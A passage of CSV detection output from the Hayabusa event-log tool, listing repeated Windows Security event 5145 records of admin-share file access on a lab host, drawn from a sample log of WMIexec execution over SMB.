0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.622 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.622 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.622 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.622 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.654 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e | IP Addr: 10.23.23.9 | LID: 